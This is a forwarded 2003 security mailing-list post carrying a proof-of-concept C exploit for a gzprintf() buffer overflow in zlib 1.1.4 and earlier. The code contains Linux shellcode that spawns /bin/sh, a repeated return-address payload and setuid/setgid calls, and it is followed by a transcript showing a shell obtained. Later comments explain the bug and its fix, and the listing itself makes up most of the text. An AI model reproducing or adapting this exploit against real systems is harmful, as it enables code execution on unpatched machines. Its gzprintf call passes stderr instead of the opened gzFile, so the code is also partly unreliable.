Fw: poc zlib sploit just for fun :)

Niki Guldbrand nikig at vip.cybercity.dk
Wed Feb 26 00:02:15 GMT 2003



Begin forwarded message:

Date: Sun, 23 Feb 2003 10:38:40 -0800 (PST)
From: Crazy Einstein <crazy_einstein at yahoo.com>
To: bugtraq at securityfocus.com
Subject: poc zlib sploit just for fun :)



/*
\   PoC local exploit for zlib <= 1.1.4
/      just for fun..not for root :)
\
/   Usage: gcc -o zlib zlib.c -lz
\
/   by CrZ [crazy_einstein at yahoo.com] lbyte [lbyte.void.ru]
*/


#include <zlib.h>
#include <errno.h>
#include <stdio.h>


/*
 * Proof-of-concept driver from the posting: it builds a very long string and
 * hands it to zlib's gzprintf() with a "%s" format. The header comment above
 * states the affected range as zlib <= 1.1.4.
 *
 * NOTE(review): the root cause is not visible in this file. As publicly
 * described, the affected gzprintf() formatted its output into a fixed-size
 * internal buffer without a length check -- confirm against the zlib sources
 * for the version you are auditing.
 *
 * Defender's view: the durable fix is a zlib release newer than the range
 * named above (or a vendor build whose gzprintf() uses bounded formatting).
 * Until then, callers should not pass attacker-influenced or
 * unbounded-length data through gzprintf(); length-explicit calls such as
 * gzwrite() avoid the formatting step entirely.
 *
 * The listing is kept as posted for reference. It is specific to one
 * platform: the transcript below the code shows a 32-bit stack address.
 */
int main(int argc, char **argv) {
        /* Opaque machine-code bytes followed by the string "/bin/sh".
         * Only its address is used below; the bytes are never copied. */
        char shell[]=
                "\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
                "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
                "\xc0\x88\x43\x07\x89\x5b\x08\x89"
                "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
                "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
                "/bin/sh";
        gzFile f;
        int ret;
        long xret;           /* numeric form of the address of shell[] */
        char cret[10];       /* the four address bytes as a C string */
        char badbuff[10000]; /* scratch first, then the oversized argument */
        int i;

        /* Round-trip the address of shell[] through text to get an integer.
         * xret is a long but is read with %x here and printed with %x below,
         * so the listing assumes long and unsigned int have the same width. */
        sprintf(badbuff,"%p",shell);
        sscanf(badbuff,"0x%x",&xret);

        printf("[>] exploiting...\n");

        /* Open a gzip stream on /dev/null so any compressed output is
         * discarded; exit if it cannot be opened. */
        if(!(f = gzopen("/dev/null", "w"))) {
                perror("/dev/null");
                exit(1);
        }

        printf("[>] xret = 0x%x\n",xret);

        /* Serialise xret into four bytes, least-significant first, with the
         * low byte increased by 4. */
       
sprintf(cret,"%c%c%c%c",(xret&0xff)+4,(xret>>8)&0xff,
                       
(xret>>16)&0xff,(xret>>24)&0xff);

        /* Clear the scratch buffer so strcat() starts from an empty string. */
        bzero(badbuff,sizeof(badbuff));

        /* 1250 appends of cret: up to 5000 bytes of the repeated address
         * value, which still fits the 10000-byte local array. */
        for(i=0;i<5000;i+=4) strcat(badbuff,cret);

        /* The return values of setuid()/setgid() are ignored. These calls
         * only succeed when the process already has the privilege to change
         * ids; the header comment says the PoC is "not for root". */
        setuid(0);
        setgid(0);
        /* The oversized string is passed to gzprintf() here; this is the call
         * the posting is about. A defensive caller would bound the length
         * before formatting. */
        ret = gzprintf(stderr, "%s", badbuff );
        setuid(0);
        setgid(0);
        /* Diagnostics: report the return values of gzprintf() and gzclose()
         * together with errno. */
        printf(">Sent!..\n");
        printf("gzprintf -> %d\n", ret);
        ret = gzclose(f);
        printf("gzclose -> %d [%d]\n", ret, errno);

        exit(0);
}


[crz at blacksand crz]$ gcc -o zlib zlib.c -lz
[crz at blacksand crz]$ ./zlib
[>] exploiting...
[>] xret = 0xbffff8f0
sh-2.05b$ exit
exit
[crz at blacksand crz]$





-- 
Med Venlig Hilsen / Best Regards
                              |  Teleservice Esbjerg A/S
Niki Guldbrand                |  Salingsundvej 4
IT-Administrator              |  6715 Esbjerg N
                              |  Denmark
Phone         : +45 79144544  |
Direct Phone  : +45 79144589  |  Web : http://www.teleservice.com
Fax           : +45 79144599  |

E-Mail        : Niki.Guldbrand at teleservice.com

--------------
enhance, v.:
	To tamper with an image, usually to its detriment.
--------------

